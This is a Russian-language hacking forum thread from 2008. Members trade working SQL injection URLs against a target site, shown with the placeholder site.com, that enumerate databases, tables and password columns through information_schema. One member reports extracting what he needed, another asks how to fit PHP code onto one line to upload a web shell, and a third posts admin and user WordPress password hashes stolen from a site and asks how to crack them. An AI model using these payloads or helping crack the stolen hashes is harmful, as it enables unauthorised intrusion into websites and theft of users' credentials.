27.11.2008, 07:29
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Сообщение от 159932
http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'+limit+1,1--
также
http://site.com/non.php?id=-6+union+select+1,concat(table_schema,0x2e,table_na me,0x3a,column_name),3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--
и скажи тут результ..
по первому запросу - так же пусто, ни какой информации не выводит.
а по второму вот:
information_schema.ROUTINES:SQL_ADMIN
В принципе то же самое что и в моем случае, только дальше, делаю запрос, опять пусто.
НиПоНяТнО ( голосом Реввы)
|
|
|
27.11.2008, 07:53
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
дай ссыль в личку
|
|
|
|
27.11.2008, 09:35
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
_Pantera_
Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),ta ble_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables --
таким запросом ты узнаеш все бд )
а вот таким запросом ты посмотришь БД в которых лежит таблица..
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema),4, 5,6,7,8+from+information.tables+where+table_name= азвание таблы--
а вобще я бы сначало искал в каких таблицах и бд есть колонка например пасс)
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema,tab le_name),4,5,6,7,8+from+information.columns+where+ column_name+like+char(название поля)--
Последний раз редактировалось sabe; 27.11.2008 в 19:59..
|
|
|
|
27.11.2008, 09:50
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Сообщение от sabe
_Pantera_
Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
Код:
http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),ta ble_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables --
таким запросом ты узнаеш все бд )
table_schema - имя БД
table_NAME - имя таблицы
а вот таким запросом ты посмотришь названия таблиц и названия БД в которых они лежат..
Код:
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema),4, 5,6,7,8+from+information.tables+where+table_name=н азвание таблы--
А это что за бред???? Этим запросом ты посмотришь имя БД в которой лежит таблица " название таблы"
PS Мужики читайте литературу, я смотрю вы нахватались кусков из хеккерских форумов, а работать с БД не умеете.
|
|
|
|
27.11.2008, 10:34
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Всем спасибо!
Все что нужно стянул.
sabe, a+
|
|
|
|
27.11.2008, 11:18
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
2pantera прав хватает по любому) потому что этот файл index.php этого же сайта)
|
|
|
|
27.11.2008, 12:31
|
|
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633
Репутация:
155
|
|
вопрос..как преобразовать пхп-код в одну строку?иными словами чтобы не было пробелов...всё в одной строке?
шелл короче залить..
|
|
|
|
27.11.2008, 12:43
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Попробуй перевести его в16битное шифрование.
Последний раз редактировалось -m0rgan-; 27.11.2008 в 12:47..
|
|
|
|
27.11.2008, 15:00
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Товарищи, прошу совета.
Добил необходимый мне ресурс. Там стоит походу вродпресс.
Вытащил значит следующие данные
(логин::пасс)
admin::$P$BaDgEI.EOMBqxOK7SWSWJfbPHfiVDT.
mary::$P$BQOOK8uZGPy9aPW/iZFQdVCYqfFEIe/
tom::$P$BMUL.P.H2ij4tFvv0RcZ.moF0RWId10
Это что вообще такое? o_O Это расшифровать реально (если это вообще хэши)?
Если да-то ткните как плз.
Я просто первый раз столкнулся, в недоумении...
|
|
|
|
27.11.2008, 15:02
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
похоже на юниксовый мд5, но там вроде на $1$ начинаться должно...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
